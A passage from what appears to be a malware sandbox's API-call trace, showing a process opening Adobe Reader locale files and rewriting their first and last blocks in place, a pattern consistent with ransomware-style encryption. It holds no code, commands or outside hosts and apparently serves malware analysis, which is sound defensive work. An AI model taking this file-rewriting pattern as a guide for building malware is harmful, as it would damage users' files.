SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0069.642] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0069.643] CloseHandle (hObject=0x1e4) returned 1 [0069.645] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\SendMail.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\sendmail.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.646] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.646] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3c00 [0069.646] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.646] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.646] ReleaseMutex (hMutex=0x168) returned 1 [0069.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CZE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CZE", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.CZE", lpUsedDefaultChar=0x0) returned 12 [0069.647] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.649] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2c00 [0069.649] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.650] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2c00 [0069.650] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e978a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.651] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0069.651] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.651] CloseHandle (hObject=0x1e4) returned 1 [0070.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\AdobeCollabSync.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\adobecollabsync.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0071.299] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.299] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0071.299] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.299] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.299] ReleaseMutex (hMutex=0x168) returned 1 [0071.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.DAN", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0071.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.DAN", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.DAN", lpUsedDefaultChar=0x0) returned 19 [0071.299] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0071.413] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0071.414] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0071.414] CloseHandle (hObject=0x1cc) returned 1 [0071.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\IA32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ia32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0071.433] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.433] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe00 [0071.433] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.433] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.433] ReleaseMutex (hMutex=0x168) returned 1 [0071.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.DAN", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.DAN", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.DAN", lpUsedDefaultChar=0x0) returned 8 [0071.433] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0071.473] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0071.474] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0071.474] CloseHandle (hObject=0x1cc) returned 1 [0071.475] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\SaveAsRTF.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\saveasrtf.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0071.517] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.517] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4600 [0071.518] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.518] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.518] ReleaseMutex (hMutex=0x168) returned 1 [0071.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.DAN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.DAN", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.DAN", lpUsedDefaultChar=0x0) returned 13 [0071.518] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.548] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3600 [0071.548] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.556] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3600 [0071.556] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.556] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0071.556] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.556] CloseHandle (hObject=0x1bc) returned 1 [0071.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\accessibility.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\accessibility.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0071.558] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.558] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb000 [0071.558] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.558] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.558] ReleaseMutex (hMutex=0x168) returned 1 [0071.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.DEU", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.DEU", cchWideChar=17, lpMultiByteStr=0x1f88d34, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.DEU", lpUsedDefaultChar=0x0) returned 17 [0071.558] ReadFile (in: hFile=0x1bc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0071.560] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa000 [0071.560] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.561] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa000 [0071.561] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.561] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0071.562] WriteFile (in: hFile=0x1bc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.562] CloseHandle (hObject=0x1bc) returned 1 [0071.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\eBook.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ebook.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0071.563] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.563] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c00 [0071.563] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.563] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.563] ReleaseMutex (hMutex=0x168) returned 1 [0071.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.DEU", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0071.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.DEU", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.DEU", lpUsedDefaultChar=0x0) returned 9 [0071.563] ReadFile (in: hFile=0x1bc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0071.565] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0071.566] WriteFile (in: hFile=0x1bc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0071.566] CloseHandle (hObject=0x1bc) returned 1 [0071.567] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\ReadOutLoud.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\readoutloud.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0071.567] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.567] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2c00 [0071.567] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0071.567] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.568] ReleaseMutex (hMutex=0x168) returned 1 [0071.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.DEU", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0071.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.DEU", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.DEU", lpUsedDefaultChar=0x0) returned 15 [0071.568] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.980] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0071.981] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.986] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0071.993] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e972d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e972d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.007] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.007] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.008] CloseHandle (hObject=0x1bc) returned 1 [0072.008] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\updater.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\updater.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0072.008] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.009] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2a00 [0072.009] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.009] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.009] ReleaseMutex (hMutex=0x168) returned 1 [0072.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.DEU", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0072.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.DEU", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.DEU", lpUsedDefaultChar=0x0) returned 11 [0072.009] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.011] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a00 [0072.011] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.012] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a00 [0072.012] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.012] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.012] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.012] CloseHandle (hObject=0x1bc) returned 1 [0072.013] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\DigSig.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\digsig.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0072.013] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.013] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x20800 [0072.013] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, 